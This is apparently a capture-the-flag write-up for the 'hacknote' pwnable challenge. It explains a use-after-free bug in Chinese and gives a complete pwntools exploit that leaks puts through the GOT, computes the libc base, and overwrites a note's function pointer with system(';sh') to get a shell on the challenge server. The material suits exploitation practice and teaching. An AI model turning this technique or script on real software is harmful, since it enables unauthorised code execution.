pwnable_hacknote 5/100

UAF 漏洞利用：note 被 delete 之后 index 1 仍然可以 show（脚本在 delete(1) 之后照常 show(1)），说明释放后的指针没有被清空。再申请一个 8 字节的 note，其内容 chunk 会复用刚释放的 note 结构体（推测结构为「函数指针 + 内容指针」），于是可以先把它改成 [打印函数, puts@got] 泄露 libc，再改成 [system, ";sh"] 拿 shell。

sh 用 “;” 分隔命令：最后一步的 payload 是 p32(system) + b";sh\x00"。show(1) 会以 note 结构体地址为参数调用其中的函数指针，等价于 system("<system 地址的 4 个字节>;sh")——前 4 个字节是一条无效命令，被 “;” 隔开之后，后面的 sh 照常执行。

exp:

from pwn import *
from LibcSearcher import * 

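# Target binary (i386, see context below) and the libc used for offsets.
local_file  = './hacknote'
remote_libc = './32libc-2.23.so'   # 32-bit glibc 2.23 shipped with the challenge

# 0 = run ./hacknote locally, anything else = attack the BUUOJ instance.
select = 1

if select == 0:
    p = process(local_file)
    # The original left `libc` undefined on this path (NameError at
    # libc.sym below) and its commented-out fallback pointed at an x86_64
    # libc, which cannot match a 32-bit target.  Ask pwntools for the
    # libc actually mapped into the live process instead.
    libc = p.libc
else:
    p = remote('node4.buuoj.cn', 28214)
    # puts/system offsets come from this file; a different libc build
    # would make libc_base (and therefore system) wrong.
    libc = ELF(remote_libc)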

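e = ELF(local_file)

# Derive arch/bits/endianness/os from the ELF header instead of hard-coding
# them, so p32()/u32() and gdb.attach() always agree with the binary.
context.binary = e
# Echo every byte sent/received -- useful while tuning the heap layout,
# noisy once the exploit is stable.
context.log_level = 'debug'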

# Thin wrappers around the tube `p` so the exploit body stays short.

def se(data):
    """Send raw bytes (no newline appended)."""
    return p.send(data)

def sa(delim, data):
    """Wait for *delim* on the tube, then send *data* without a newline."""
    return p.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return p.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return p.sendlineafter(delim, data)

def sea(delim, data):
    """Same as sa(): wait for *delim*, then send *data*."""
    return p.sendafter(delim, data)

def rc(numb=4096):
    """Receive up to *numb* bytes (default 4096)."""
    return p.recv(numb)

def rl():
    """Receive one line."""
    return p.recvline()

def ru(delims):
    """Receive until *delims* shows up (the delimiter is included)."""
    return p.recvuntil(delims)

def uu32(data):
    """Unpack a leak of up to 4 bytes as a 32-bit value, zero-padding short reads."""
    padded = data.ljust(4, b'\x00')
    return u32(padded)

def uu64(data):
    """Unpack a leak of up to 8 bytes as a 64-bit value, zero-padding short reads."""
    padded = data.ljust(8, b'\x00')
    return u64(padded)

def info_addr(tag, addr):
    """Log *addr* in hex, prefixed with *tag*, through the tube's logger."""
    return p.info(tag + ': {:#x}'.format(addr))

def dbg(cmd=''):
    """Attach gdb to the running target; *cmd* is fed to gdb as its startup script."""
    gdb.attach(p, cmd)

def add(size, content):
    """Menu option 1: create a note of *size* bytes holding *content*.

    Every prompt is answered with send(), not sendline(), so the binary is
    presumably reading fixed-length input.  Keep len(content) <= size;
    anything left over would stay in the tube and desync the later prompts.
    """
    sa(b"Your choice :", b'1')
    sa(b":", str(size).encode())
    sa(b":", content)

def delete(index):
    """Menu option 2: free note *index*.

    The binary's "Success" banner is consumed here so the next menu read
    starts from a clean tube.
    """
    sa(b"Your choice :", b'2')
    sa(b":", str(index).encode())
    ru(b"Success")

def show(index):
    """Menu option 3: print note *index*.

    Nothing is read back on purpose: the caller consumes whatever the print
    routine emits (the leaked pointer, or the shell once the note's function
    pointer has been replaced).
    """
    sa(b"Your choice :", b'3')
    sa(b':', str(index).encode())

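# Function pointer a fresh note normally carries (the binary's note-print
# routine, presumably something like puts(note->content)).  We reuse it in
# the leak stage so show() prints whatever pointer we put in the second slot.
# NOTE(review): hard-coded from the writeup -- confirm with `objdump -d hacknote`
# (or e.sym, if the binary is not stripped) before reusing on another build.
print_note = 0x804862b

# Stage 1: two notes, then free both.  On glibc 2.23 (fastbins, no tcache)
# the freed 8-byte note structs are expected to be handed back first by the
# next malloc(8) calls, so a new 8-byte note's *content* chunk should land on
# note 1's old struct -- and index 1 can still be show()n after delete(1).
add(0x10, b'/bin/sh\x00\x00')  # note 0; nothing below uses this content
add(0x10, b'bbbb')              # note 1
delete(1)
delete(0)

# Stage 2: note 2's content overlays note 1's struct as
#   [fn ptr = print_note][arg = puts@GOT]
# so show(1) prints the resolved address of puts.
add(0x8, p32(print_note) + p32(e.got['puts']))  # note 2
show(1)
puts_addr = u32(p.recv(4))
success(hex(puts_addr))
# The low 12 bits of a libc symbol survive ASLR; a mismatch means the leak
# was not puts or the libc file does not match the target.
if (puts_addr & 0xfff) != (libc.sym['puts'] & 0xfff):
    log.warning("leaked puts page offset does not match %s -- wrong libc?", libc.path)
libc_base = puts_addr - libc.sym['puts']
success("base: " + hex(libc_base))
# Named system_addr rather than `sys`, which would shadow the sys module
# that `from pwn import *` drags into this namespace.
system_addr = libc_base + libc.sym['system']

# Stage 3: free note 2 and recreate it so note 1's struct becomes
#   [fn ptr = system][";sh\x00"]
# show(1) then calls system(<note 1 struct>): the first 4 bytes (the system
# address) are an invalid command, ';' terminates it and `sh` runs.
delete(2)
add(0x8, p32(system_addr) + b";sh\x00")
show(1)

p.interactive()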
